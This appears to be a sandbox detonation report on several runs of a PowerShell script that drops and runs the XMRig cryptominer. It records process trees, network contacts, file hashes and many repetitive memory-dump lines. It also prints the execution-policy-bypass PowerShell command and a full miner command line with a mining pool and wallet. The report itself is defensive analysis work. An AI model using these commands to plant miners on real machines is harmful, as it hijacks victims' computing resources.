memory/4136-96-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-97-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-98-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-99-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-100-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-101-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-102-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-103-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-104-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-105-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-106-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-107-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-108-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-109-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-110-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-111-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-112-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-113-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-114-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-115-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-116-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-117-0x00007FF604650000-0x00007FF605283000-memory.dmp

memory/4136-118-0x00007FF604650000-0x00007FF605283000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:47

Platform

win11-20240508-en

Max time kernel

1789s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
(64 identical rows, all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 N/A tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

memory/3928-0-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

memory/3928-1-0x000001C824B90000-0x000001C824BB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgyzt5ak.r3i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3928-10-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3928-11-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3928-12-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/3928-14-0x000001C83D070000-0x000001C83D082000-memory.dmp

memory/3928-15-0x000001C83D060000-0x000001C83D06A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1212-46-0x0000018464AD0000-0x0000018464AF0000-memory.dmp

memory/1212-47-0x0000018464B20000-0x0000018464B40000-memory.dmp

memory/1212-48-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/3928-49-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

memory/1212-51-0x0000018464B60000-0x0000018464B80000-memory.dmp

memory/1212-50-0x0000018464B40000-0x0000018464B60000-memory.dmp

memory/1212-52-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/3928-53-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

memory/1212-54-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-55-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-56-0x0000018464B40000-0x0000018464B60000-memory.dmp

memory/1212-57-0x0000018464B60000-0x0000018464B80000-memory.dmp

memory/1212-58-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-59-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-60-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-61-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-62-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-63-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-64-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-65-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-66-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-67-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-68-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-69-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-70-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-71-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-72-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-73-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-74-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-75-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-76-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-77-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-78-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-79-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-80-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-81-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-82-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-83-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-84-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-85-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-86-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-87-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-88-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-89-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-90-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-91-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-92-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-93-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-94-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-95-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-96-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-97-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-98-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-99-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-100-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-101-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-102-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-103-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-104-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-105-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-106-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-107-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-108-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-109-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-110-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-111-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-112-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-113-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-114-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-115-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

memory/1212-116-0x00007FF7F6270000-0x00007FF7F6EA3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted 2024-05-26 13:33
Reported 2024-05-27 06:23
Platform win10-20240404-en
Max time kernel 1795s
Max time network 1804s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1428-4-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-5-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-6-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-7-0x0000022C3B030000-0x0000022C3B052000-memory.dmp

memory/1428-10-0x0000022C3B360000-0x0000022C3B3D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfzcyjqs.y4h.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1428-25-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-48-0x0000022C3B3E0000-0x0000022C3B3F2000-memory.dmp

memory/1428-61-0x0000022C3B340000-0x0000022C3B34A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3688-90-0x0000013AA9890000-0x0000013AA98B0000-memory.dmp

memory/1428-91-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/3688-92-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/1428-93-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/1428-94-0x00007FFC29290000-0x00007FFC2946B000-memory.dmp

memory/3688-95-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-96-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-97-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-98-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-99-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-100-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-101-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-102-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-103-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-104-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-105-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-106-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-107-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-108-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-109-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-110-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-111-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-112-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-113-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-114-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-115-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-116-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-117-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-118-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-119-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-120-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-121-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-122-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-123-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-124-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-125-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-126-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-127-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-128-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-129-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-130-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-131-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-132-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-133-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-134-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-135-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-136-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-137-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-138-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-139-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-140-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-141-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-142-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-143-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-144-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-145-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-146-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-147-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-148-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-149-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-150-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-151-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-152-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-153-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-154-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-155-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

memory/3688-156-0x00007FF6E71C0000-0x00007FF6E7DF3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted 2024-05-26 13:33
Reported 2024-05-27 06:29
Platform win10-20240404-en
Max time kernel 1797s
Max time network 1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/2768-2-0x00007FFD0B763000-0x00007FFD0B764000-memory.dmp

memory/2768-5-0x00000227B7980000-0x00000227B79A2000-memory.dmp

memory/2768-6-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-9-0x00000227B7B60000-0x00000227B7BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ntk3alp4.pyc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2768-10-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-25-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/2768-48-0x00000227B7B20000-0x00000227B7B32000-memory.dmp

memory/2768-61-0x00000227B79B0000-0x00000227B79BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1632-90-0x000001AA464A0000-0x000001AA464C0000-memory.dmp

memory/1632-91-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/2768-93-0x00007FFD0B763000-0x00007FFD0B764000-memory.dmp

memory/1632-92-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/2768-94-0x00007FFD0B760000-0x00007FFD0C14C000-memory.dmp

memory/1632-95-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-96-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-97-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-98-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-99-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-100-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-101-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-102-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-103-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-104-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-105-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-106-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-107-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-108-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-109-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-110-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-111-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-112-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-113-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-114-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-115-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-116-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-117-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-118-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-119-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-120-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-121-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-122-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-123-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-124-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-125-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-126-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-127-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-128-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-129-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-130-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-131-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-132-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-133-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-134-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-135-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-136-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-137-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

memory/1632-138-0x00007FF7BE110000-0x00007FF7BED43000-memory.dmp

